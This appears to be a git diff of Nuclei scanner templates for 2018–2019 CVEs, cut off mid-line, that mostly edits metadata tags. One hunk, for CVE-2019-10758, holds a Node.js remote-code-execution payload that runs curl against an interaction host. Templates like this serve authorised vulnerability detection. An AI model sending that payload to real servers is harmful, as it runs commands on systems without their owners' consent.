a/config/nuclei-templates/cves/2018/CVE-2018-3714.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-3714.yaml @@ -13,7 +13,7 @@ info: cvss-score: 6.5 cve-id: CVE-2018-3714 cwe-id: CWE-22 - tags: cve,cve2018,nodejs,lfi + tags: cve,cve2018,nodejs,lfi,hackerone requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-3760.yaml b/config/nuclei-templates/cves/2018/CVE-2018-3760.yaml index 581996b99..a3eda2134 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-3760.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-3760.yaml @@ -17,7 +17,7 @@ info: cvss-score: 7.5 cve-id: CVE-2018-3760 cwe-id: CWE-200 - tags: cve,cve2018,rails,lfi,ruby + tags: cve,cve2018,rails,lfi,ruby,vulhub,seclists requests: - raw: diff --git a/config/nuclei-templates/cves/2018/CVE-2018-3810.yaml b/config/nuclei-templates/cves/2018/CVE-2018-3810.yaml index 0527d91a3..44ba97199 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-3810.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-3810.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2018-3810 cwe-id: CWE-287 - tags: wordpress,cve,cve2018,google + tags: wordpress,cve,cve2018,google,edb requests: - method: POST diff --git a/config/nuclei-templates/cves/2018/CVE-2018-5316.yaml b/config/nuclei-templates/cves/2018/CVE-2018-5316.yaml index aa09f75a8..ceb94ae6b 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-5316.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-5316.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2018-5316 cwe-id: CWE-79 - tags: cve,cve2018,wordpress,xss,wp-plugin,woocommerce + tags: cve2018,wordpress,xss,wp-plugin,woocommerce,packetstorm,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-5715.yaml b/config/nuclei-templates/cves/2018/CVE-2018-5715.yaml index 075108266..256d579e3 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-5715.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-5715.yaml @@ -18,7 +18,7 @@ info: metadata: google-dork: intext:"SugarCRM Inc. All Rights Reserved" shodan-query: http.html:"SugarCRM Inc. All Rights Reserved" - tags: cve,cve2018,sugarcrm,xss + tags: sugarcrm,xss,edb,cve,cve2018 requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-6008.yaml b/config/nuclei-templates/cves/2018/CVE-2018-6008.yaml index 1e302599a..35dc3a319 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-6008.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-6008.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2018-6008 cwe-id: CWE-200 - tags: cve,cve2018,joomla,lfi + tags: cve,cve2018,joomla,lfi,edb,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-7251.yaml b/config/nuclei-templates/cves/2018/CVE-2018-7251.yaml index 9e9e52044..f05000b3c 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-7251.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-7251.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.8 cve-id: CVE-2018-7251 cwe-id: CWE-200 - tags: cve,cve2018,anchorcms,logs,error + tags: cve,cve2018,anchorcms,logs,error,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-7422.yaml b/config/nuclei-templates/cves/2018/CVE-2018-7422.yaml index 5d6ea39b8..1a5613fe9 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-7422.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-7422.yaml @@ -16,7 +16,7 @@ info: cvss-score: 7.5 cve-id: CVE-2018-7422 cwe-id: CWE-22,CWE-829 - tags: cve,cve2018,wordpress,wp-plugin,lfi + tags: cve,cve2018,wordpress,wp-plugin,lfi,edb,seclists requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-7467.yaml b/config/nuclei-templates/cves/2018/CVE-2018-7467.yaml index 278e142a0..2ffec8bec 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-7467.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-7467.yaml @@ -14,7 +14,7 @@ info: cvss-score: 7.5 cve-id: CVE-2018-7467 cwe-id: CWE-200 - tags: cve,cve2018,axxonsoft,lfi + tags: axxonsoft,lfi,packetstorm,cve,cve2018 requests: - raw: diff --git a/config/nuclei-templates/cves/2018/CVE-2018-7490.yaml b/config/nuclei-templates/cves/2018/CVE-2018-7490.yaml index 36e764082..4d46603b6 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-7490.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-7490.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2018-7490 cwe-id: CWE-22 - tags: cve,cve2018,uwsgi,php,lfi,plugin + tags: cve,cve2018,uwsgi,php,lfi,plugin,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-7600.yaml b/config/nuclei-templates/cves/2018/CVE-2018-7600.yaml index d033e879c..bf7b4ce66 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-7600.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-7600.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-20 metadata: shodan-query: http.component:"drupal" - tags: cve,cve2018,drupal,rce,kev,cisa + tags: cve,cve2018,drupal,rce,kev,cisa,vulhub requests: - raw: diff --git a/config/nuclei-templates/cves/2018/CVE-2018-7602.yaml b/config/nuclei-templates/cves/2018/CVE-2018-7602.yaml index d954e05a1..37170ea82 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-7602.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-7602.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-7602 metadata: shodan-query: http.component:"drupal" - tags: cve,cve2018,drupal,authenticated,kev,cisa + tags: cve2018,drupal,authenticated,kev,cisa,vulhub,edb,cve requests: - raw: diff --git a/config/nuclei-templates/cves/2018/CVE-2018-7719.yaml b/config/nuclei-templates/cves/2018/CVE-2018-7719.yaml index a1fe1cbc8..0736b1dee 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-7719.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-7719.yaml @@ -17,7 +17,7 @@ info: cvss-score: 7.5 cve-id: CVE-2018-7719 cwe-id: CWE-22 - tags: cve,cve2018,acrolinx,lfi + tags: cve,cve2018,acrolinx,lfi,packetstorm,edb requests: - raw: diff --git a/config/nuclei-templates/cves/2018/CVE-2018-8719.yaml b/config/nuclei-templates/cves/2018/CVE-2018-8719.yaml index bbf0fcba5..ac63fc549 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-8719.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-8719.yaml @@ -15,7 +15,7 @@ info: cvss-score: 5.3 cve-id: CVE-2018-8719 cwe-id: CWE-532 - tags: wordpress,wp-plugin,cve,cve2018,exposure + tags: cve2018,exposure,edb,wordpress,wp-plugin,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-8727.yaml b/config/nuclei-templates/cves/2018/CVE-2018-8727.yaml index 3285f2e67..5a4605288 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-8727.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-8727.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2018-8727 cwe-id: CWE-22 - tags: cve,cve2018,mirasys,lfi + tags: cve,cve2018,mirasys,lfi,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-8770.yaml b/config/nuclei-templates/cves/2018/CVE-2018-8770.yaml index af3e6f8f3..aa760a990 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-8770.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-8770.yaml @@ -14,7 +14,7 @@ info: cvss-score: 5.3 cve-id: CVE-2018-8770 cwe-id: CWE-200 - tags: cve,cve2018,cobub,razor,exposure + tags: cve,cve2018,cobub,razor,exposure,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-9118.yaml b/config/nuclei-templates/cves/2018/CVE-2018-9118.yaml index a56feb389..3cfa19081 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-9118.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-9118.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.5 cve-id: CVE-2018-9118 cwe-id: CWE-22 - tags: cve,cve2018,wordpress,wp-plugin,lfi,traversal,wp + tags: edb,cve,cve2018,wordpress,wp-plugin,lfi,traversal,wp requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-9161.yaml b/config/nuclei-templates/cves/2018/CVE-2018-9161.yaml index f1f172c1c..4fbaef9de 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-9161.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-9161.yaml @@ -14,7 +14,7 @@ info: cvss-score: 9.8 cve-id: CVE-2018-9161 cwe-id: CWE-798 - tags: cve,cve2018,prismaweb,exposure + tags: cve,cve2018,prismaweb,exposure,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-9205.yaml b/config/nuclei-templates/cves/2018/CVE-2018-9205.yaml index 7b192e26e..8cd486924 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-9205.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-9205.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-22 metadata: shodan-query: http.component:"drupal" - tags: cve,cve2018,lfi,drupal + tags: cve,cve2018,lfi,drupal,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-9995.yaml b/config/nuclei-templates/cves/2018/CVE-2018-9995.yaml index 69fef29ce..9f556785e 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-9995.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-9995.yaml @@ -18,7 +18,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-9995 - tags: cve,cve2018,auth-bypass,tbk + tags: cve,cve2018,auth-bypass,tbk,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-0193.yaml b/config/nuclei-templates/cves/2019/CVE-2019-0193.yaml index 360706171..ef3535455 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-0193.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-0193.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.2 cve-id: CVE-2019-0193 cwe-id: CWE-94 - tags: cve,cve2019,apache,rce,solr,oast,kev + tags: cve2019,apache,rce,solr,oast,kev,vulhub,cve requests: - raw: diff --git a/config/nuclei-templates/cves/2019/CVE-2019-0221.yaml b/config/nuclei-templates/cves/2019/CVE-2019-0221.yaml index b324ba022..f52d29981 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-0221.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-0221.yaml @@ -19,7 +19,7 @@ info: cwe-id: CWE-79 metadata: shodan-query: title:"Apache Tomcat" - tags: cve,cve2019,apache,xss,tomcat + tags: apache,xss,tomcat,seclists,edb,cve,cve2019 requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-0230.yaml b/config/nuclei-templates/cves/2019/CVE-2019-0230.yaml index 071708b08..417a3be69 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-0230.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-0230.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2019-0230 cwe-id: CWE-915 - tags: struts,rce,cve,cve2019,apache + tags: tenable,packetstorm,struts,rce,cve,cve2019,apache requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-10068.yaml b/config/nuclei-templates/cves/2019/CVE-2019-10068.yaml index b6d2a23d5..bf09cb3e9 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-10068.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-10068.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2019-10068 cwe-id: CWE-502 - tags: cve,cve2019,rce,deserialization,kentico,iis,kev + tags: cve2019,kentico,iis,packetstorm,cve,rce,deserialization,kev,msf requests: - method: POST diff --git a/config/nuclei-templates/cves/2019/CVE-2019-10475.yaml b/config/nuclei-templates/cves/2019/CVE-2019-10475.yaml index 8eb691c48..d3a3b6f67 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-10475.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-10475.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2019-10475 cwe-id: CWE-79 - tags: cve,cve2019,jenkins,xss,plugin + tags: cve,cve2019,jenkins,xss,plugin,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-10758.yaml b/config/nuclei-templates/cves/2019/CVE-2019-10758.yaml index 0e50aa9b6..d940f888f 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-10758.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-10758.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2019-10758 metadata: shodan-query: http.title:"Mongo Express" - tags: cve,cve2019,mongo,mongo-express,kev + tags: vulhub,cve,cve2019,mongo,mongo-express,kev requests: - raw: @@ -26,7 +26,7 @@ requests: Authorization: Basic YWRtaW46cGFzcw== Content-Type: application/x-www-form-urlencoded - document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl{{interactsh-url}}") + document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl {{interactsh-url}}") matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction diff --git a/config/nuclei-templates/cves/2019/CVE-2019-11013.yaml b/config/nuclei-templates/cves/2019/CVE-2019-11013.yaml index 2c3e839b0..e9ed33fc6 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-11013.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-11013.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.5 cve-id: CVE-2019-11013 cwe-id: CWE-22 - tags: cve,cve2019,lfi,nimble + tags: cve2019,lfi,nimble,edb,packetstorm,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-11370.yaml b/config/nuclei-templates/cves/2019/CVE-2019-11370.yaml index ce4cdd1ba..c2f5e3f80 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-11370.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-11370.yaml @@ -18,7 +18,7 @@ info: metadata: shodan-query: http.html:"pCOWeb" verified: "true" - tags: cve,cve2019,pcoweb,xss,carel + tags: pcoweb,xss,carel,edb,cve,cve2019 requests: - raw: diff --git a/config/nuclei-templates/cves/2019/CVE-2019-11869.yaml b/config/nuclei-templates/cves/2019/CVE-2019-11869.yaml index 8a81b37e2..53774ff41 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-11869.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-11869.yaml @@ -22,7 +22,7 @@ info: cvss-score: 6.1 cve-id: CVE-2019-11869 cwe-id: CWE-79 - tags: cve,cve2019,wordpress,wp-plugin,xss + tags: wpscan,cve,cve2019,wordpress,wp-plugin,xss requests: - raw: diff --git a/config/nuclei-templates/cves/2019/CVE-2019-12314.yaml b/config/nuclei-templates/cves/2019/CVE-2019-12314.yaml index 4fc83720a..1ff737bb3 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-12314.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-12314.yaml @@ -14,7 +14,7 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12314 cwe-id: CWE-22 - tags: cve,cve2019,lfi + tags: cve,cve2019,lfi,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-12616.yaml b/config/nuclei-templates/cves/2019/CVE-2019-12616.yaml index 05db9837a..aa2135bff 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-12616.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-12616.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.5 cve-id: CVE-2019-12616 cwe-id: CWE-352 - tags: cve,cve2019,phpmyadmin,csrf + tags: csrf,edb,cve,cve2019,phpmyadmin requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-12962.yaml b/config/nuclei-templates/cves/2019/CVE-2019-12962.yaml index 3d377aa20..13749b9d0 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-12962.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-12962.yaml @@ -19,7 +19,7 @@ info: metadata: shodan-query: http.html:LiveZilla verified: true - tags: cve,cve2019,livezilla,xss + tags: xss,edb,packetstorm,cve,cve2019,livezilla requests: diff --git a/config/nuclei-templates/cves/2019/CVE-2019-13101.yaml b/config/nuclei-templates/cves/2019/CVE-2019-13101.yaml index 21a3efbbc..f0d71f162 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-13101.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-13101.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2019-13101 cwe-id: CWE-306 - tags: cve,cve2019,dlink,router,iot + tags: edb,cve,cve2019,dlink,router,iot requests: - raw: diff --git a/config/nuclei-templates/cves/2019/CVE-2019-13396.yaml b/config/nuclei-templates/cves/2019/CVE-2019-13396.yaml index 2c6ab9715..50a702c17 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-13396.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-13396.yaml @@ -14,7 +14,7 @@ info: cvss-score: 5.3 cve-id: CVE-2019-13396 cwe-id: CWE-22 - tags: cve,cve2019,flightpath,lfi + tags: cve,cve2019,flightpath,lfi,edb requests: - raw: diff --git a/config/nuclei-templates/cves/2019/CVE-2019-14312.yaml b/config/nuclei-templates/cves/2019/CVE-2019-14312.yaml index 3dec6fac8..582e6ef3a 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-14312.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-14312.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.5 cve-id: CVE-2019-14312 cwe-id: CWE-22 - tags: cve,cve2019,lfi + tags: cve,cve2019,lfi,edb,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-14322.yaml b/config/nuclei-templates/cves/2019/CVE-2019-14322.yaml index e77f3b48b..13eed465b 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-14322.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-14322.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2019-14322 cwe-id: CWE-22 - tags: cve,cve2019,lfi,odoo + tags: cve2019,lfi,odoo,packetstorm,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-14470.yaml b/config/nuclei-templates/cves/2019/CVE-2019-14470.yaml index 1c58b1975..0671b8b40 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-14470.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-14470.yaml @@ -16,7 +16,7 @@ info: cvss-score: 6.1 cve-id: CVE-2019-14470 cwe-id: CWE-79 - tags: cve,cve2019,wordpress,xss,wp-plugin + tags: wordpress,xss,wp-plugin,wpscan,packetstorm,cve,cve2019 requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-14696.yaml b/config/nuclei-templates/cves/2019/CVE-2019-14696.yaml index 4667b30b8..2eea2b494 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-14696.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-14696.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2019-14696 cwe-id: CWE-79 - tags: cve,cve2019,xss + tags: packetstorm,cve,cve2019,xss requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-14974.yaml b/config/nuclei-templates/cves/2019/CVE-2019-14974.yaml index 3ff062576..799b9f73b 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-14974.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-14974.yaml @@ -12,7 +12,7 @@ info: cvss-score: 6.1 cve-id: CVE-2019-14974 cwe-id: CWE-79 - tags: cve,cve2019,xss,sugarcrm + tags: cve2019,xss,sugarcrm,edb,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-15107.yaml b/config/nuclei-templates/cves/2019/CVE-2019-15107.yaml index c6b5b0ec1..8e9e449b7 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-15107.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-15107.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2019-15107 cwe-id: CWE-78 - tags: cve,cve2019,webmin,rce,kev + tags: cve,cve2019,webmin,rce,kev,edb requests: - raw: # diff --git a/config/nuclei-templates/cves/2019/CVE-2019-15501.yaml b/config/nuclei-templates/cves/2019/CVE-2019-15501.yaml index d49c72767..e14df7457 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-15501.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-15501.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2019-15501 cwe-id: CWE-79 - tags: cve,cve2019,xss,listserv + tags: cve,cve2019,xss,listserv,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-15713.yaml b/config/nuclei-templates/cves/2019/CVE-2019-15713.yaml index d05e3811c..c306a57b3 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-15713.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-15713.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2019-15713 cwe-id: CWE-79 - tags: cve,cve2019,wordpress,xss,wp-plugin + tags: cve,cve2019,wordpress,xss,wp-plugin,wpscan requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-15811.yaml b/config/nuclei-templates/cves/2019/CVE-2019-15811.yaml index 392eb4054..58f9eabdb 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-15811.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-15811.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: cve,cve2019,domainmod,xss,authenticated + tags: cve,cve2019,domainmod,xss,authenticated,edb requests: - raw: diff --git a/config/nuclei-templates/cves/2019/CVE-2019-15859.yaml b/config/nuclei-templates/cves/2019/CVE-2019-15859.yaml index 4a8a9ab83..3f4801adc 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-15859.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-15859.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2019-15859 cwe-id: CWE-200 - tags: cve,cve2019,disclosure,socomec,diris,iot + tags: seclists,packetstorm,cve,cve2019,disclosure,socomec,diris,iot requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-16123.yaml b/config/nuclei-templates/cves/2019/CVE-2019-16123.yaml index 82416273f..3078881e7 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-16123.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-16123.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2019-16123 cwe-id: CWE-22 - tags: cve,cve2019,piluscart,lfi + tags: piluscart,lfi,packetstorm,edb,cve,cve2019 requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-16278.yaml b/config/nuclei-templates/cves/2019/CVE-2019-16278.yaml index 290be2f6c..5ebfa0ba3 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-16278.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-16278.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2019-16278 cwe-id: CWE-22 - tags: cve,cve2019,rce + tags: edb,cve,cve2019,rce,packetstorm requests: - raw: diff --git a/config/nuclei-templates/cves/2019/CVE-2019-16525.yaml b/config/nuclei-templates/cves/2019/CVE-2019-16525.yaml index dbad51921..934701e91 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-16525.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-16525.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2019-16525 cwe-id: CWE-79 - tags: cve,cve2019,wordpress,xss,wp-plugin + tags: xss,wp-plugin,packetstorm,cve,cve2019,wordpress requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-1653.yaml b/config/nuclei-templates/cves/2019/CVE-2019-1653.yaml index d59f255b3..2b7d4683b 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-1653.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-1653.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.5 cve-id: CVE-2019-1653 cwe-id: CWE-200 - tags: cve,cve2019,cisco,router,exposure,kev + tags: kev,edb,cve,cve2019,cisco,router,exposure requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-16759.yaml b/config/nuclei-templates/cves/2019/CVE-2019-16759.yaml index 64c03bea1..936703b5c 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-16759.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-16759.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2019-16759 cwe-id: CWE-94 - tags: cve,cve2019,vbulletin,rce,kev + tags: rce,kev,seclists,cve,cve2019,vbulletin requests: - raw: diff --git a/config/nuclei-templates/cves/2019/CVE-2019-16931.yaml b/config/nuclei-templates/cves/2019/CVE-2019-16931.yaml index 92723cdf9..076ee50a8 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-16931.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-16931.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: cve,cve2019,wp-plugin,wordpress,wp,xss,unauth + tags: cve,cve2019,wp-plugin,wordpress,wp,xss,unauth,wpscan requests: - raw: diff --git a/config/nuclei-templates/cves/2019/CVE-2019-16932.yaml b/config/nuclei-templates/cves/2019/CVE-2019-16932.yaml index 074dc0615..97f300658 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-16932.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-16932.yaml @@ -16,7 +16,7 @@ info: cvss-score: 10 cve-id: CVE-2019-16932 cwe-id: CWE-918 - tags: cve,cve2019,wp-plugin,ssrf,wordpress,xss,unauth + tags: cve,cve2019,wp-plugin,ssrf,wordpress,xss,unauth,wpscan requests: - method: POST diff --git a/config/nuclei-templates/cves/2019/CVE-2019-17270.yaml b/config/nuclei-templates/cves/2019/CVE-2019-17270.yaml index 6da2a5f4f..610ea6c3e 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-17270.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-17270.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2019-17270 cwe-id: CWE-78 - tags: rce,yachtcontrol,cve,cve2019 + tags: rce,yachtcontrol,cve,cve2019,edb,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-17382.yaml b/config/nuclei-templates/cves/2019/CVE-2019-17382.yaml index e7ef6a6f2..698d3e583 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-17382.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-17382.yaml @@ -13,7 +13,7 @@ info: cvss-score: 9.1 cve-id: CVE-2019-17382 cwe-id: CWE-639 - tags: cve,cve2019,zabbix,fuzz,auth-bypass,login + tags: fuzz,auth-bypass,login,edb,cve,cve2019,zabbix requests: - raw: diff --git a/config/nuclei-templates/cves/2019/CVE-2019-17503.yaml b/config/nuclei-templates/cves/2019/CVE-2019-17503.yaml index 54c9acaac..a29a0b8b0 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-17503.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-17503.yaml @@ -15,7 +15,7 @@ info: cvss-score: 5.3 cve-id: CVE-2019-17503 cwe-id: CWE-425 - tags: cve,cve2019,exposure + tags: cve,cve2019,exposure,edb,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-18371.yaml b/config/nuclei-templates/cves/2019/CVE-2019-18371.yaml index 9be742b6a..49dfb3776 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-18371.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-18371.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2019-18371 cwe-id: CWE-22 - tags: xiaomi,cve2019,cve,lfi,router,mi,router + tags: cve2019,cve,lfi,router,mi,xiaomi requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-18818.yaml b/config/nuclei-templates/cves/2019/CVE-2019-18818.yaml index 3e560d9c4..72cb51e5e 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-18818.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-18818.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2019-18818 cwe-id: CWE-640 - tags: 